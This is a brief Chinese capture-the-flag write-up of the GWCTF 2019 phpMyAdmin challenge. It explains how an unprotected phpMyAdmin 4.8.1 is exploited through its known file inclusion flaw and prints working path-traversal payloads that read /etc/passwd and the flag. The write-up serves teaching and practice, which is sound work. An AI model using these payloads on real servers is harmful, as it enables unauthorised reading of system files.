[GWCTF 2019] 我有一个数据库

本题考点:

  • phpmyadmin 漏洞

# 过程

题目提示,我有一个数据库,那么猜测 目录 phpmyadmin,无密码直接登录

看到版本信息为 4.8.1

image-20210720171508770

phpmyadmin4.8.0-4.8.1 存在文件包含漏洞
使用网上的 payload 直接打

?target=db_datadict.php%253f/../../../../../../../../etc/passwd

能够执行,修改为 flag,读取 flag

?target=db_datadict.php%253f/../../../../../../../../flag

image-20210720171636494

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

zeroc 微信支付

微信支付

zeroc 支付宝

支付宝

zeroc 贝宝

贝宝